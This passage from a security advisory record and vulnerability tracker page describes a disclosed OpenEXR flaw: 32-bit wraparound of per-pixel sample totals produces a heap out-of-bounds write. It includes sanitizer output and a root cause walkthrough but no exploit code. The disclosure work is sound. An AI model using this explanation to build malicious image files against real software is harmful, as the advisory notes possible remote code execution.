/home/pop/sec/openexr/src/lib/OpenEXRCore/unpack.c:1374 in generic_unpack_deep_pointers\nShadow bytes around the buggy address:\n 0x7ed1a55d8e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d8f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x7ed1a55d9000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=\u003e0x7ed1a55d9080: 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9200: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\n 0x7ed1a55d9300: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07\n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n==175024==ABORTING\n```\n\n## Root cause analysis\n\nIn `CompositeDeepScanLine::readPixels`:\n\n1. Per-pixel totals are accumulated in `vector\u003cunsigned int\u003e total_sizes`.\n2. For attacker-controlled large counts across many parts, `total_sizes[ptr]` wraps modulo `2^32`.\n3. `overall_sample_count` is then derived from wrapped totals and used in `samples[channel].resize(overall_sample_count)`.\n4. Decode pointer setup/consumption proceeds with true sample counts, and write operations in core unpack (`generic_unpack_deep_pointers`) overrun the undersized composite sample buffer.\n\n\nAllocation is based on a tiny wrapped value, but decode writes correspond to the true large sample volume.\n\n## Impact\n\nHeap OOB write during decode. This is at minimum a reliable crash/DoS. As heap corruption, this bug could be used for potential remote code execution.",
"id": "GHSA-cr4v-6jm6-4963",
"modified": "2026-03-04T02:00:10Z",
"published": "2026-03-02T18:30:20Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"type": "PACKAGE",
"url": "https://github.com/AcademySoftwareFoundation/openexr"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenEXR\u0027s CompositeDeepScanLine integer-overflow leads to heap OOB write"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.